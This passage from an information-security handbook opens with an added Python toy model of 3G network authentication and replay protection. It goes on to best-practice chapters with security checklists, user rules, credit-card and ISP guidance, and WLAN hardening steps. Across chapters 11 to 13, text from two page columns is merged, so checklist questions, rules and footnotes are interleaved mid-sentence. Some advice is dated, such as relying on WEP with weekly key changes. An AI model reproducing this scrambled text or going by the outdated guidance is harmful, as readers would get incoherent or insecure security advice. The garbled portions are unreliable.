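The two 3G defenses named in the discussion above, a sequence number that lets the mobile recognize the genuine network and integrity protection with replay inhibition on signaling such as the connection set-up request, can be seen working in a small simulation. The Python model below is an added illustration and is not code from this Handbook or from any 3GPP specification: HMAC-SHA256 stands in for the 3GPP f1..f9 functions, the session-key derivation and message formats are invented for the example, and the class names `HomeNetwork` and `Mobile` are assumptions. It shows a false base station (no subscriber key) being rejected, a replayed challenge being rejected, the GSM-style one-way check accepting the same impostor, and a man in the middle's "cipher=off" flip on the set-up request being detected by the integrity check.

```python
"""Toy model of the 3G protections described above, beside GSM-style one-way
authentication.  Constructed educational example: HMAC-SHA256 stands in for the
3GPP f1..f9 functions; key derivation and message formats are invented."""
import hashlib
import hmac
import os

SQN_LEN = 6  # bytes carried for the sequence number in this model


def mac(key: bytes, *parts: bytes) -> bytes:
    """Keyed MAC over the concatenation of parts."""
    h = hmac.new(key, digestmod=hashlib.sha256)
    for p in parts:
        h.update(p)
    return h.digest()


class HomeNetwork:
    """Switch side: holds the subscriber key K and the next sequence number."""

    def __init__(self, k: bytes):
        self.k = k
        self.sqn = 0

    def challenge(self):
        """Return (RAND, AUTN). AUTN binds the sequence number to RAND under K,
        so only a party holding K can produce it: this is what lets the mobile
        'identify the network' and reject a false base station."""
        rand = os.urandom(16)
        sqn = self.sqn.to_bytes(SQN_LEN, "big")
        self.sqn += 1
        return rand, sqn + mac(self.k, rand, sqn)


class Mobile:
    """Handset/USIM side: holds K and the highest sequence number accepted."""

    def __init__(self, k: bytes):
        self.k = k
        self.sqn_seen = -1

    def check_network(self, rand: bytes, autn: bytes) -> str:
        """3G-style check: verify the network's MAC, then require a fresh SQN."""
        sqn, tag = autn[:SQN_LEN], autn[SQN_LEN:]
        if not hmac.compare_digest(tag, mac(self.k, rand, sqn)):
            return "reject: network MAC invalid (false base station)"
        n = int.from_bytes(sqn, "big")
        if n <= self.sqn_seen:
            return "reject: sequence number not fresh (replay)"
        self.sqn_seen = n
        return "accept"

    @staticmethod
    def gsm_style_check(rand: bytes) -> str:
        """GSM-style: the phone answers any RAND; nothing lets it verify the
        base station, which is the weakness the session-hijacking item notes."""
        return "accept"


def integrity_protect(ik: bytes, count: int, msg: bytes) -> bytes:
    """Append a MAC over (COUNT, msg). COUNT provides the replay inhibition."""
    return msg + b"|" + mac(ik, count.to_bytes(4, "big"), msg).hex().encode()


def integrity_verify(ik: bytes, count: int, frame: bytes) -> bool:
    """Serving-network side: accept the frame only if MAC and COUNT match."""
    msg, _, tag = frame.rpartition(b"|")
    expected = mac(ik, count.to_bytes(4, "big"), msg).hex().encode()
    return hmac.compare_digest(tag, expected)


def demo() -> dict:
    k = bytes(range(16))  # constructed subscriber key shared by USIM and home network
    net, ue = HomeNetwork(k), Mobile(k)

    rand, autn = net.challenge()
    genuine = ue.check_network(rand, autn)    # fresh challenge from the real network
    replayed = ue.check_network(rand, autn)   # same AUTN again: replay is caught
    false_bs = HomeNetwork(os.urandom(16))    # false base station without K
    fake_rand, fake_autn = false_bs.challenge()
    impostor = ue.check_network(fake_rand, fake_autn)

    # Forcing-unencrypted attack: the mobile asks for ciphering in its
    # connection set-up request; a man in the middle flips the flag.
    ik = mac(k, rand, b"IK")                  # toy session integrity key
    setup = integrity_protect(ik, 0, b"SETUP cipher=on")
    tampered = setup.replace(b"cipher=on", b"cipher=off")
    return {
        "genuine": genuine,
        "replayed": replayed,
        "impostor": impostor,
        "gsm_accepts_impostor": Mobile.gsm_style_check(fake_rand),
        "setup_ok": integrity_verify(ik, 0, setup),
        "tampered_ok": integrity_verify(ik, 0, tampered),
        "stale_ok": integrity_verify(ik, 1, setup),  # wrong COUNT: replay rejected
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The last entry in the result, `stale_ok`, is the part the text calls replay inhibition: a set-up request captured earlier and re-sent carries a COUNT the serving network has already moved past, so it fails even though its MAC was once valid.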
VII. Conclusion

The most distributed networks are the most vulnerable to interception and unauthorized access. There is often maximum vulnerability to interception at the point where there is interconnection between fiber, coax, satellite, and terrestrial wireless systems. Air interface standards are but one example where modern telecommunications and IT systems are open to interception.

The market has followed the trend of the so-called Pelton Merge,⁸⁴ which calls for continued improvement of "seamless interface standards" that allow the smooth interconnection of fiber, coax, terrestrial wireless, satellites, and other new and evolving technologies, such as high altitude platforms. The challenge is to develop standards that allow easy and reliable interconnection and also protect security.

One possible solution might be to re-examine the ISO seven-layer model of telecommunications and, in particular, to consider the creation of a new layer that provides truly secure communication based on a 256- or even 1024-bit code that is constantly updateable. Further study would need to be given to whether the ultimate solution is a separate layer or the re-engineering of part of an existing layer that could be devoted to this task. Nonetheless, the risks associated with e-finance are great.

The confidentiality and integrity threat posed by the GSM and 802.11 protocols can be mitigated to an extent. Beyond the use of VPNs, the protection of the gateway and the correspondent servers is essential. It is important for banking institutions to comprehend the various methods that may help to protect the network resources themselves while the VPN technology protects the authorized payload. Banks and their correspondent telecom partners should begin to institute proper layered security measures, particularly at the "gateway" level. Mitigation of the risk associated with mobile communications will become more critical as commerce and finance increasingly are conducted over what amount to vulnerable, integrated technologies. The widespread adoption of WLANs and GSM technologies by financial institutions around the world has weakened the security of the payment system. These porous mediums were not developed for the movement of digital assets. As the apparent trends of e-finance continue, "mobile risk management" is going to become increasingly important to the banking industry in the years ahead.

84. Contributed by Dr. Pelton, Executive Director of the Clarke Institute.

CHAPTER 11. BEST PRACTICES: BUILDING A SECURITY CULTURE

At a Glance

In Part 3 we have described the security role and functions in the organization, whether that organization is a small or medium-sized business, a non-profit entity, an academic institution, or a government agency. In discussing the responsibility for organizational security, we have emphasized that someone must take the lead role, but we have not assumed that there will be an exclusive staff position of Chief Security Officer, for example, with the exception of larger organizations. In SMEs there are often budget and staffing constraints that make it unlikely to have official Chief Security Officers (CSOs) or other full-time security experts on the payroll. Nevertheless, any enterprise driven by or dependent on technology should have one person, or at most a small group of people, designated with responsibility for security. Uniform procedures, good reporting standards, and vigilant, but friendly, relationships with other employees, outside contractors, vendors, and customers will help this employee or team perform the necessary functions for the organization. This chapter provides detailed suggestions on taking a layered approach to security, including a policy statement on the twelve layers of security. This statement is followed by a selection of checklists that will help employees and members of the management team with day-to-day responsibility for security in the organization.

Best Practices: The 12 Layers of E-Security⁸⁵

Management of e-security risks can be thought of as a twofold process. The first part is risk analysis, which has three major components: identify and inventory assets for a baseline, analyze and assign values to the assets, and establish how critical each asset is, in priority order.

The second part of security is development of an approach to risk management. The major elements of risk management are to develop and implement policies and procedures, educate users (employees and customers), and audit and monitor for quality assurance. A prudent approach might reflect the following thesis: "Expect to be hit – Prepare to survive."

The three general axioms to remember in building a security program are as follows:

· Attacks and losses are inevitable.
· Security buys time.
· The network is only as secure as its weakest link.

Twelve core layers of proper security are essential for maintaining the integrity of data and mitigating the risks associated with open architecture environments, and in many instances, actual implementation of a specific layer need not entail large capital investments or outlays.

1. Information Security Officer – The creation of the position of Chief Security Officer who oversees that the other 11 layers are carried out and implemented in accordance with the best practices below (and most details available in Glaessner, Kellermann and McNevin, "Electronic Security: Risk Mitigation in Financial Transaction").
2. Risk Management – A broad-based framework based upon CERT's OCTAVE paradigm for managing assets and relevant risks to those assets.
3. Access Controls/Authentication – Establish the legitimacy of a node or user before allowing access to requested information. During the process, the user enters a name or account number (identification) and password (authentication). The first line of defense is access controls; these can be divided into passwords, tokens, biometrics, and public key infrastructure (PKI).
4. Firewalls – Create a system or combination of systems that enforces a boundary between two or more networks.
5. Active content filtering – At the browser level, it is prudent to filter all material that is not appropriate for the workplace or that is contrary to established workplace policies.
6. Intrusion detection system (IDS) – This is a system dedicated to the detection of break-ins or break-in attempts, either manually or via software expert systems that operate on logs or other information available on the network. Approaches to monitoring vary widely, depending on the types of attacks that the system is expected to defend against, the origins of the attacks, the types of assets, and the level of concern for various types of threats.
7. Virus scanners – Worms, Trojans, and viruses are methods for deploying an attack. A virus is a program that can replicate itself by infecting other programs on the same system with copies of itself. Trojans do not replicate or attach themselves to other files. Virus scanners hunt malicious code.
8. Encryption – Encryption algorithms are used to protect information while it is in transit or whenever it is exposed to theft of the storage device (e.g. removable backup media or notebook computer).
9. Vulnerability testing – Vulnerability testing entails obtaining knowledge of vulnerabilities that exist on a computer system or network and using that knowledge to gain access to resources on the computer or network while bypassing normal authentication barriers.
10. Proper systems administration – This should be complete with a list of administrative failures that typically exist within financial institutions and corporations and a list of best practices.

85. Source: Glaessner, Thomas, Kellermann, Tom, McNevin, "Electronic Security: Risk Mitigation in Financial Transactions – Public Policy Issues," June 2002, The World Bank.

company executives who will lead the security policy effort.

Are executive-level summaries produced regularly? How often?
Does a clear communication path exist from the top level of management to the line-level workers? Does everyone know what or where that communication path is?
Does responsibility for security rest with a Vice President, Director of Security, or other member of management?
Has management demonstrated that it is committed to the company's security program by appropriately presenting and enforcing it?
Has adequate funding for security been allocated and made available?
Do all system administrators understand the importance of reporting and resolving security issues quickly?
Is security awareness training provided as part of the standard orientation for new employees at all levels from line-level to upper management?
Have steps been taken to ensure that all employees from the top down are aware of the company's information-protection policies?
11.Policy Management Software--a software program Were the realities of the company's culture (in terms should control company policy and procedural of management/worker relationships) considered when guidelines vis-à-vis employee computer usage. the security policies and procedures were developed? 12.Business Continuity/Incident response plan Do employees know whom to call for help when a (IRP)--This is the primary document used by a security breach occurs or when they don't understand corporation to define how it will identify, respond to, their roles? correct, and recover from a computer security incident. Are security audits conducted regularly? Every 6 The main necessity is to have an IRP and to test it months? Yearly? periodically. Employees' Responsibilities Executive Support Checklist 86 In order to foster a security culture, managers must: As we have seen in previous chapters, education and awareness of security issues are key to creating an envi- - Explain what constitutes a good security program. ronment where employees are best able to assist in the - Emphasize that security is important at all levels of protection of their organization. In part, the personnel the organization. will take their lead from the management team's atti- - Encourage people to ask questions on technology tude toward security issues and the corresponding and procedures related to security. investment in training and communication on security - Ask that the entire team be vigilant and report any and related areas. The checklist is designed for unusual activity, both in the office and over the network. 86Source: ITS, Chapter 3 Executive Support, p. 50. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 141 - Outline what is being done to protect employees' Are management's goals tied to security? privacy and security, but make it clear that Are routine audits conducted to verify risk-assessment allegiance to the organization comes first conclusions? 
and intentional security breaches will not be tolerated. Are external auditors used when appropriate is assessing and reducing risk? The following checklist is designed to help managers train employees to assist in the security function: Are all employees (managers, as well as system administrators) assigned and evaluated based on Security Training Checklist87 security goals? Do all managers, from the top down, voice a corporate Loss Prevention Checklist89 commitment to security? Do they back up that commitment with funding for Do you know what you are trying to protect on your security training? network? Does that training program include details on Was management involved in risk assessment? configuring and supporting security? Are policies easy to read and understand? Do security training policies exist? Does everyone either have a copy of the policies or at Are they thorough, current, and widely known? least have access to one? Are all employees, including executive managers, Does someone "own" responsibility for the policies P trained on their security responsibilities for the and procedures? ART company? Does the policy owner attend security conferences and Does a framework exist for developing and continuing keep current on policy issues? security awareness? Do you conduct periodic audits to verify that security THREE controls are in place? Control and Risk Management Framework Are you sure that all person's installing your systems have been trained on your company's security policies In Chapters 2, 3, and 4, we reviewed common threats and procedures? to security (risk evaluation) and loss analysis. We Do you double-check that all known security problems also developed guidelines for security policies and have been addressed before bringing new hardware or procedures that would strengthen the organization's software systems online? resistance to attack and accidental loss. The response Do you configure and review audit logs? How often? 
plan included a listing of practical security assessment and suggested a range of perimeter defenses. Physical Security: Internal and External Networks The following checklists offer further detail on risk Physical security has been covered in varying degrees of assessment and loss prevention. detail in Part 2 (Security for Individuals), Part 3, and Part 5 (Security for Technical Administrators). On the Review your Risks Checklist88 technical side, there are a number of areas to cover from a security standpoint, including internal networks, Was a risk assessment completed recently? How often external networks, and control of access to networks. is it updated? The following checklists are designed to aid in the effort to protect the physical assets in a networked Have systems been classified by risk level (non-critical, environment. critical, mission critical)? 87Source: ITS, Chapter 5 Security Training, p. 81. 88Source: ITS, Chapter 6 Unplanned Security, p. 95. 89Source: ITS, Chapter 2 Out-of-the-Box Security, P. 32. 142 INFORMATION SECURITY AND GOVERNMENT POLICIES Internal Network Security Checklist90 Are lessons learned from break-ins shared and used to build better processes? Are there policies and procedures for system configurations? Network Access Checklist92 Do those policies and procedures cover files Is management involved in the external-connection permissions, passwords, and patches? approval process? Do you disable unnecessary services? Does someone keep track of external connections? Is there a policy covering physical security? Does management know how many employees and Do all account users have passwords? contractors have external connections? Have any default accounts installed with the systems Are unnecessary network services disabled? been changed? Are all outside connections evaluated for true need Are default guest accounts banned as a matter before approval? of policy? 
Does your company conduct routine audits to Are dormant accounts regularly disabled? maintain control over external connections? Are security patches applied as part of the installation Are procedures in place to disable connections when for all new systems? employees and contractors resign? Do you try to crack the passwords on the systems you Do policies and procedures exist for installing firewalls? support to test for easily-guessed passwords? Do policies and procedures exist for installing How often? customer connections (extranets)? Do you look for unauthorized changes to files? Are all connection-related policies and procedures How often? enforced? Do you use caution when exporting file systems? Security Audits External Networks and Firewalls Checklist91 While an organization may spend a great deal of time Are security roles and responsibilities clearly defined? and money crafting excellent security polices and proce- Has someone been assigned to audit the firewall on a dures, training employees, and listening to its managers regular basis? How often? and security experts, the efficiency of these efforts must Has someone been assigned to regularly conduct be tested from time to time. Security audits will find firewall penetration tests? holes in the security plan which may not have been Has someone been assigned to upgrade the firewall understood, or may have arisen with growth and change when necessary? in the lifecycle of the organization. Security audits are Are firewall administration, upgrades, and routine also useful in helping to ensure compliance; if would be maintenance adequately funded? violators know that you are on the lookout for them, Do managers understand their own security roles and they may curtail their activities on your systems. those of the people who report to them? Are emergency roles and responsibilities clearly, and Among the most common mistakes discovered by formally, defined? 
routine audits: Do support personnel have specific preventive procedures to follow? - Security patches are not installed Is intrusion detection software installed on networks - Excessive file permissions have been granted and systems? - Passwords are easy to guess Is auditing software installed on mission-critical - Unnecessary network services are enabled systems? - Firewalls are not on or not enforced Is virus protection installed at every entry point? 90Source: ITS, Chapter 8 Internal Network Security, p. 121. 91Source: ITS, Chapter 7 Maintaining Security, p. 109. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 143 The following checklist is provided to set a baseline for your security audits, whether they are conducted by internal staff or outsourced to security professionals in your area. Audit Procedures Checklist93 Does your company have a formal audit policy? Does your company have written audit procedures for testing security? Are audits conducted on a regular schedule? Is auditing software installed on all platforms in use (Windows, Mac, Unix/Linux)? Is funding provided to buy the required auditing tools? Does management support security auditing by providing the right training for auditors? Outsourcing P Finally, we are aware that the complexity of IT security ART may prompt some organizations to hire outside special- ists to handle their security needs. The chapter on out- sourcing provided a detailed discussion of what to look THREE for in outsourcing firms, how to manage their activities, and when to increase your scrutiny of their practices at your location. The following checklist serves as an additional resource to firms that are considering the use of outside contractors for the security function. Outsourcing Security Checklist94 (Technical considerations) Are supplier and customer connections (extranets) audited on a regular basis? How often? 
Does a formal architecture exist for connecting suppliers and customers to your network via extranets? Does a formal policy exist to spell out when, why, and how extranet connections will be permitted? Is management approval required before brining an extranet connection online? Is a formal security audit required before bringing an extranet connection online? 93Source: ITS, Chapter 9 Outsourcing Security, p. 133. 94Source: ITS, Chapter 9 Outsourcing Security, p. 133. 144 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 12. Twenty-five Specific Rules for More GENERAL RULES FOR ALL COMPUTER Secure Computing USERS AND COMPANIES ENGAGED IN E-COMMERCE Rule 1: Think about computer theft before it happens. Four Easy Steps to a More Secure Computer Rule 2: Make backups regularly and take steps to ensure that they will survive if your computer is physically Running a secure computer is a lot of work. If you don't threatened. have time for the full risk-assessment and cost-benefit analysis described previously, we recommend that you Rule 3: Select passwords that you will be able to at least follow these four easy steps: remember but will be very difficult for someone else to guess. 1. Decide how important security is for your site. If you think security is very important and that Rule 4: Keep your operating system and key application your organization will suffer significant loss in the software up-to-date. case of a security breach, the response must be given sufficient priority. Assigning an overworked Rule 5: Configure your mail program not to open attach- programmer who has no formal security training to ments automatically. handle security on a half-time basis is a sure invitation to problems. Rule 6: Before opening any attachment, look at the name to verify that it is not an executable program. 2. Involve and educate your user community. 
Do the users at your site understand the dangers Rule 7: Never open an attachment from someone you do and risks involved with poor security practices not know unless you are very sure that it is a type of (and what those practices are)? Your users should file that cannot contain malicious code. know what to do and who to call if they observe something suspicious or inappropriate. Educating Rule 8: Do not open an attachment from someone you your user population helps make them a part of do know and trust unless you are sure that they sent your security system. Keeping users ignorant of it deliberately. system limitations and operation will not increase the system security--there are always other Rule 9: Consider configuring your e-mail program sources of information for determined attackers. to not process "fancy" HTML and not to send it to other computers. 3. Devise a plan for making and storing backups of your system data. You should have off-site back Rule 10: Check with your ISP to see if they are ups so that even in the event of major disaster, checking e-mails for viruses and similar threats you can reconstruct your systems. before delivering e-mail. 4. Stay inquisitive and suspicious. If something Rule 11: Do not allow web sites to download and happens that appears unusual, suspect an intruder execute potentially malicious programs on your and investigate. You'll usually find that the computer unless you know that the site is trustworthy. problem is only a bug or a mistake in the way a system resource is being used. But occasionally, Rule 12: Display the web site address you are visiting you may discover something more serious. For this and the address you are linking to, and pay attention reason, each time something happens that you to them while visiting an unfamiliar web site, especially can't definitively explain, you should suspect a if you are allowing the site to execute programs on security problem and investigate accordingly. our computer. 
Rule 13: Consider controlling under what situation you allow cookies to be stored on your computer. If you cannot control them (such as when using a computer in a public location), consider not entering private information.

Rule 14: If there is any sort of private information displayed on a web page, clear the cache after the session is over. If you cannot clear the cache (from a computer in a public location, for example), you may decide not to use this particular computer for the task.

Rule 15: If you are not using file sharing, disable it. If you are using it, to the extent possible, limit the kinds of things that can be done to those functions that you need.

Rule 16: If you use file sharing, set robust usernames and passwords and limit the access permissions to the least possible that will allow you to do your work.

Rule 17: If you share files with another user, make sure that they take security seriously.

Rule 18: Instant messaging can be very helpful, but use it with care and knowledge.

Rule 19: Disable all Internet services that are not needed and used regularly.

Rule 20: Every computer that is vulnerable to viruses should run anti-virus software and should check for up-to-date virus signatures daily. A full scan of the machine should be performed periodically as well.

Rule 21: Computers that are not particularly subject to viruses, such as Unix-based systems, should nevertheless ensure that the mail that they send out does not contain a virus that may harm the recipient.

Rule 22: Keep your operating system and key application software up-to-date.

Rule 23: All computers should be protected by a firewall of some sort, either software within the computer, or an external firewall protecting that computer or an entire local network of computers.

Rule 24: If you use remote access facilities to remotely control any computers, make sure that they have robust security (at the very least, excellent usernames and passwords) to ensure that attackers do not use these same tools.

Rule 25: System functions and applications logs should be judiciously enabled.

Checklist for Companies Engaged in Credit Card Transactions

A) If your computer is not on a network:

· The company's computers should be kept in a physically secure location.
· A robust password is used to unlock the computer and a minimum number of people should know the password.
· Physical access allows a person to circumvent passwords, so physical security is important. If you have physical access to the machine, you can boot it using a CD or floppy, completely bypassing all security measures built into the operating system and application (other than encryption).
· File-level security should be used to restrict access to data; only those people that must work with the data should have access to it. (For Windows machines, this means you must use the NTFS file system.)
· Deploy up-to-date security patches on the operating system, the database system and all application software. Note that more recent versions of operating systems are much easier to secure than older versions.
· Run anti-virus and intruder detection software on the system.
· Credit card data files should be encrypted with strong encryption.
· Precautions should be taken to ensure that temporary files do not contain unencrypted information. When no longer needed, these files should not be simply erased; they should undergo the electronic equivalent of shredding.
· Logs should be used to track all accesses to sensitive files, and the logs should be scanned regularly for potential problems or error indications. Consider writing two copies of logs and locating the second log on a different host than the one running the application.
· Monitor security alert mailing lists to ensure that if there is a potential breach related to your systems, you know about it quickly.
· In the case of a potential or actual breach, take all precautions immediately to reduce risk - containment.
· Ensure that all staff understand that security is important to the organization and that senior management places it very high on its priority list.
· If you dispose of the hard disk which contains credit card or other financial data, make sure that the data is no longer accessible; this procedure goes beyond deleting the files; seek professional assistance if you are not sure how to destroy data completely.
· Make regular backups and ensure that backups which contain credit card information are handled securely.
· If you do credit card charge validation online, make sure that this link is secure. If you are working with a dial-up modem, ensure that incoming calls are not allowed.
· If you print records with credit card information on them, physically secure them, and shred them when they are no longer needed.
· Buy several up-to-date books from respected sources on e-commerce security, read them, and follow their advice. O'Reilly & Associates, John Wiley & Sons and Osborne/McGraw-Hill have excellent books on the subject of IT security. Such books may be expensive, depending on your location, but they are a good investment.

B) If the computer must be accessible to the internal network:

· All the items mentioned above, and:
· Set up a firewall to ensure that only legitimate users and transactions can contact this machine, and that general Internet access is not allowed.
· Install up-to-date security patches on all network equipment (routers, firewalls, switches, etc.).
· Consider using encrypted transmission for all credit card-related messages.
· Turn off all network services on the computer that are not essential (such as File Transfer Protocol, Remote Procedure Call, web server).

C) If credit card information is accessible via the WWW:

· All previous items mentioned above, and:
· Do not put credit card information on an Internet-accessible machine. Keep the data on a separate machine behind a firewall and use a remote procedure call (RPC) or other communications method to access the file, with appropriate filtering at the firewall.
· Encrypt the transactions over the network (SSL or an equivalent) using the strongest encryption practical (128 bit, if available).
· Ensure that credit card information that is temporarily stored on the web server is erased once the transaction is complete.

If credit card information must reside on the Internet-accessible machine:

· All of the above precautions apply, but with increased awareness of the security risks - monitor this machine, the transactions, and the logs very carefully.

Checklist for Consumer Data Protection on a Web Site

Here is a simple but workable policy that we recommend for web sites that are interested in respecting personal privacy. Tell people about your policy on your home page, and allow your company to be audited by outsiders if there are questions regarding your policies.

· Do not require users to register to use your site.
· Allow users to register with their e-mail addresses if they wish to receive bulletins.
· Do not share a user's e-mail address with another entity without that user's explicit permission for each organization with which you wish to share the e-mail address.
· Whenever you send an e-mail message to users, explain to them how you obtained their e-mail addresses and how they can get their addresses off your mailing list.
· Do not make your log files publicly accessible.
· Delete your log files when they are no longer needed.
· If your log files must be kept online for extended periods of time, remove personally identifiable information from them.
· Encrypt your log files if possible.
· Do not give out personal information regarding your users.
· Discipline or fire employees who violate your privacy policy.

Checklist for Internet Service Providers (ISPs)

This list is more inclusive than many ISPs will implement, but it is important to assess all options and make conscious business decisions regarding which you will implement.

· Since you certainly store credit card and/or other customer financial information, all of the rules for credit card storage apply.
· Security should not be haphazard - understand the issues and draw up a plan.
· Establish a security policy including: to what extent you will respect the privacy of customer data (with respect to access by your staff or outside agencies); reporting processes in the event of a security breach (reporting both within your organization, to outside Internet providers, and the authorities).
· Identification of your legal responsibilities (are you a common carrier, to what extent must you retain log files, etc.).
· Establish policies on how you will respond to security alerts and concerns from your clients, from other peer ISPs, from your major bandwidth providers and from the rest of the Internet.
· Beware of the fact that certain customers of your service may attack outside systems. You may develop a policy for responding to reports from other ISPs that one of your customers is engaging in an attack, spreading a virus, etc.
· You may decide not to send virus-blocked notifications back to senders via e-mail if ISP-wide virus scanning is in place.
· Establish an Acceptable Use Policy (AUP) including ISP and Client responsibilities. This AUP should be referenced in any client contracts.
· Design a network so that to the extent practical and possible, the systems that control and manage your network (including accounting) are firewalled from the general Internet.
· Ensure that you use robust passwords and restricted access rules for all of your management machines, service machines (such as e-mail, web, authentication, proxy and DNS servers) and all network routing and monitoring equipment.
· Ensure that all non-essential services (ftp, icq, finger, compilers, etc.) are disabled on machines accessible to the Internet.
· Ensure that all machines, but particularly ones accessible to the Internet, are kept up to date with respect to security patches.
· Establish continuous network monitoring so that you can recognize problems such as denial of service attacks and major spam and virus activities. This requires understanding what your normal traffic patterns are.
· Establish computer monitoring capabilities to attempt to recognize computer intruders (don't forget machines housing logs, accounting data).
· Consider installing virus checkers for all incoming and outgoing e-mail.
· Consider making one of the free or low-price anti-virus products available to your customers to encourage them to be secure.
· Protect your mail servers from being used as spam relay points.
· Consider installing spam control measures.
· Log all server accesses and network connections/disconnections, maximizing your ability to retroactively do forensic analysis to understand security breaches.
· Establish a rigorous and redundant set of procedures for backing up your data and that of your users.
· Consider downloading and distributing (electronically or via CD) major software patches to your customers (thereby making it easy for them to remain current and secure, and reducing your international bandwidth).

15 Steps to Securing WLANs

Wireless network security is much like the physical security at the entrance of a building. Someone with enough interest, resources, and time is going to be able to gain access. First and foremost, it is important to treat your wireless network as though it were a publicly accessible network. A system administrator should not make any assumptions that his or her traffic on that network is private and secure. The following security recommendations, compiled from a host of industry leaders, will provide some simple rules of thumb that can provide a foundation for securing a WLAN:

1. Create an institution-wide policy regarding wireless devices. Tailor the corporate security policy to address network usage guidelines.

2. Track how many employees have WLANs at home. These remote access users need to be monitored, in order to eliminate unauthorized wireless access points.

3. Define an account provisioning process to securely manage clients' accounts which includes tokens.

4. Disable all unneeded services and applications on each client and server. Typically, all services and applications that are not known or in use should be disabled.

5. Change the default settings of your product. Many administrators make the mistake of not changing any of the SSID or IP address information for their access points. Don't change the SSID to reflect your company's name, divisions, or products. Since this information is broadcast by the access point, once the hacker has broken WEP, they know exactly whose network they are accessing.

6. Change the default password on your access point or wireless router. Hackers often know the manufacturers' default passwords, and will try them first.

7. Plan your coverage to radiate out to the windows, but not beyond. As you do your site survey for access point deployment, think about locating the access points toward the center of your building rather than near the windows. If the access points are located near the windows, a stronger signal will be radiated outside your building, making it easier for people to find you.

8. Provide directional antennas for wireless devices. Most wireless devices utilize omni-directional antennas; these antennae allow for systematic "sniffing" (recording) of all communications. Directional antennas coupled with a 2.4 Gig or higher frequency will lessen the propagation of the signal.

9. Turn WEP on and manage your WEP key by changing the default key and subsequently, changing the WEP key on a weekly basis.95

10. Use VPN tunneling between the network firewall and the wireless. Though it would require a VPN server, the VPN client is already included in many operating systems such as Windows 98 Second Edition, Windows 2000, and Windows XP.

11. Deploy a network based intrusion detection system (NIDS) on the wireless network.96

12. Deploy enterprise-wide anti-virus software on all wireless clients.

13. Employ two-factor authentication. There are two ways in which two-factor authentication is best employed. First, token-based smart cards that store a biometric record.97 The two-factor approach mitigates a tremendous amount of risk. Second, the use of Radius Servers, which authenticate the machine to the network. A Radius server permits association with your access points. A user connects to the radius server merely for authentication to the other servers. One can implement a biometric to initialize the server thus abiding by the two-factor authentication mantra. Radius98 servers act as a guard would in a lobby, authorizing passage to the rest of the building.

14. Consider using a Wireless Firewall Gateway.99 This device operates as a standard dual-homed firewall with the wireless network on one side and the trusted network on the other. The firewall has security software such as IPSEC or other VPN enabled, and only after authenticating to that software can access be granted to the internal network. The firewall rules may also be used to limit where traffic originating from wireless networks may traverse. Make sure that the network firewall is between all wireless access points and the internal network or Internet.

15. Disable DHCP and use static IP addresses for your wireless NICs. Also change the default IP address range for your wireless network from the manufacturer's default.

16. Purchase access points that have "flashable" firmware only. There are a number of security enhancements that are being developed, and you want to be sure that you can upgrade your access point.

95 Input provided by the NIPC http://www.nipc.gov/publications/nipcpub/bestpract.html.
96 Input provided by Chris Bateman of CERT Analysis Center.
97 Bateman recommends the e-thenticator, which is a thumb print biometric scanner that stores the image on a smart card.
98 RADIUS or Remote Authentication Dial-In User Service is an authentication service that verifies user information and once verified, allows users to access certain network services. Part of what RADIUS can provide is encrypted communication between the remote client and the RADIUS server. Virtual Private Networks (VPNs) work in a similar manner but tend to operate on a network-to-network connection instead of the remote host to network method of RADIUS. Once the remote computer is authenticated and connected to the internal network via a RADIUS server, it operates as if it were physically located near and connected to the network. In other words, the encryption provided by the RADIUS server is only between the RADIUS server and the client machine, not over the network as a whole. Rick Fleming stated that: "Cisco's Aeronet Tacacs Server is premier for this service."

Additional Information on VPNs

To protect information systems that may use any of these technologies, users should deploy Virtual Private Network (VPN) technology at each and every trusted gateway into their networks and ensure that every user accessing the trusted network uses VPN technology.

from one network to another. Second, data packets traveling the Internet are transported in clear text. Consequently, anyone who can see Internet traffic can also read the data contained in the packets. This is clearly a problem if banks desire to use the Internet to pass important, confidential business information. VPNs overcome these obstacles by using a strategy called tunneling. Instead of packets crossing the Internet out in the open, data packets are first encrypted for security, and then encapsulated in an IP package by the VPN and tunneled through the Internet. Many vendors such as Nokia, Cisco, Nortel, Checkpoint, and Microsoft among others have viable, secure VPN technologies100 that can be deployed at multiple locations in a corporate network. While VPNs provide content protection for that information traversing the network, depending on how they are deployed, they may not provide any protection from extraneous users accessing the network itself. In other words, an unauthorized user may not be able to see the content because of the VPN, but they can still access the network resources and utilize the bandwidth, causing network congestion and possibly denial of service to authorized users. Access control, authentication, and encryption are vital elements of a secure connection. The Point-to-Point Protocol (PPP) has long been used as the Internet's universal link layer for creating tunnel
A links between devices, but in more recent years, the virtual private network is essentially a private connec- Point-to-Point Tunneling Protocol (PPTP) and Layer 2 tion between two machines that sends private data traf- Tunneling Protocol (L2TP) have prevailed.101 fic over a shared or public network, the Internet. VPN technology lets an organization securely extend its net- work services over the Internet to remote users, branch offices, and partner companies. In other words, VPNs turn the Internet into a simulated private wide area network (WAN). VPNs allow remote workers access their companies' servers. To use the Internet as a private wide area network, organizations may have to overcome two main hurdles. First, networks often communicate using a variety of protocols; VPNs provide a way to pass non-IP protocols 99 Rick Fleming, VP of Security Operations, Digital Defense, Inc. 100The standards for VPN are currently in revision by the IETF to make IP Sec more secure, but also make it compatible with satellite communications. 101Karen Bannan's article "Safe Passage" in PC Magazine reviews seven VPN providers for products that would suit a medium-size business with a budget of $10,000 that needed a VPN for its central and branch offices. http://www.pcmag.com/print_article/0,3048,a%3D12352,00.asp 150 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 13. purposes, as well as the technology sector for GLOBAL DIALOGUES ON SECURITY intellectual capital. AT THE WORLD BANK The introduction to e-risk also addressed the topic of At a Glance wireless vulnerabilities, specifically in GSM (Global Standard Mobile). Two key points were made with regards to wireless risks: the gateway vulnerability, and the "man The following international examples of IT security in the middle" attack. The latter can occur because cellular breaches, solutions, and current policy initiatives are towers fail to authenticate to cellular phones. drawn from two events held by The World Bank. 
